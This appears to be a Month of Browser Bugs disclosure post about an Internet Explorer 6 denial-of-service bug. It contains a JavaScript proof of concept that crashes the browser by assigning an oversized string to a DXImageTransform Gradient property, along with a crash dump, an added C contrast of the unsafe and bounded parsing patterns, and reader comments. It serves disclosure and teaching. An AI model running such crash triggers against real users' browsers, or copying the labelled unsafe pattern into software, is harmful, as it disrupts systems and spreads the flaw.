MoBB #17: Gradient StartColorStr
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the StartColorStr or EndColorStr properties to a large value leads to a stack overflow exception (not a buffer overflow).
var a = new ActiveXObject('DXImageTransform.Microsoft.Gradient.1'); // instantiate the Gradient filter control
var b = 'XXXX';
while (b.length <= (1024*1024)) b += b; // double the string until it passes 1 MiB (ends at 2 MiB)
a.StartColorStr = b;                    // the oversized property value exhausts the stack
Demonstration
eax=00007004 ebx=00100001 ecx=0004215c
edx=0013b1ac esi=03b00024 edi=00000000
eip=6be11a16 esp=0013b154 ebp=0013b190
dxtmsft!_chkstk+0x25:
6be11a16 8501 test [ecx],eax ds:0023:0004215c=00000000
This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.Gradient Multiple Property Stack Overflow
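The crash frame above sits in the compiler's stack probe, which is consistent with a stack frame whose size follows the length of the supplied string. As an added example (not the post's code, nor the closed-source DXImageTransform control), here is a hypothetical reconstruction in C of that pattern beside a version that bounds the input first; the "#AARRGGBB" format, the function names and the idea that the control parses on the stack are assumptions.

```c
/* Added example, not code from the post or dxtmsft.dll: a hypothetical "#AARRGGBB" parser. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#define COLOR_STR_LEN 9                   /* strlen("#AARRGGBB"), assumed format */
static int hex_nibble(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    c |= 0x20;                            /* fold A-F to a-f */
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}
/* Parses "#AARRGGBB" from a buffer known to hold exactly n bytes.
 * Returns the ARGB value (0..0xFFFFFFFF) or -1 if malformed. */
static long long hex_to_argb(const char *buf, size_t n) {
    if (n != COLOR_STR_LEN || buf[0] != '#') return -1;
    uint32_t v = 0;
    for (size_t i = 1; i < n; i++) {
        int d = hex_nibble(buf[i]); if (d < 0) return -1;
        v = (v << 4) | (uint32_t)d;
    }
    return (long long)v;
}
/* UNSAFE shape: the frame is sized by caller-controlled input. A 2 MiB string
 * exceeds Windows' default 1 MiB thread stack, the probe (_chkstk) touches the
 * guard page and raises the exception in the dump: exhaustion, not an overrun. */
long long parse_color_str_unsafe(const char *s) {
    size_t n = strlen(s);
    char buf[n + 1];                      /* VLA: grows with the input */
    memcpy(buf, s, n + 1);
    return hex_to_argb(buf, n);
}
/* SAFE shape: bound the length before any buffer exists, so the frame size
 * is a constant and the scan stops after COLOR_STR_LEN + 1 bytes. */
long long parse_color_str(const char *s) {
    size_t n = 0;
    while (n <= COLOR_STR_LEN && s[n] != '\0') n++;
    if (n > COLOR_STR_LEN) return -1;     /* oversized: reject without copying */
    char buf[COLOR_STR_LEN + 1];
    memcpy(buf, s, n + 1);
    return hex_to_argb(buf, n);
}
/* Feeds the bounded parser a constructed 2 MiB heap string, the length the PoC's
 * doubling loop ends at; returns its verdict (-1 = rejected, -2 = no memory). */
long long reject_huge_input(void) {
    size_t len = 2u << 20;
    char *big = malloc(len + 1);
    if (!big) return -2;
    memset(big, 'X', len); big[len] = '\0';
    long long rc = parse_color_str(big);
    free(big);
    return rc;
}
```

The bounded parser never lets input decide how much stack it uses, which is the property a fix for this class of bug has to restore.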
2 Comments:
why "not a buffer overflow"?
A stack overflow is not the same as a stack buffer overflow. The issue is that the application used all available stack memory and the verification function detected this condition and threw an exception. This exception is fatal - the application crashes - but it does not lead to a directly exploitable condition.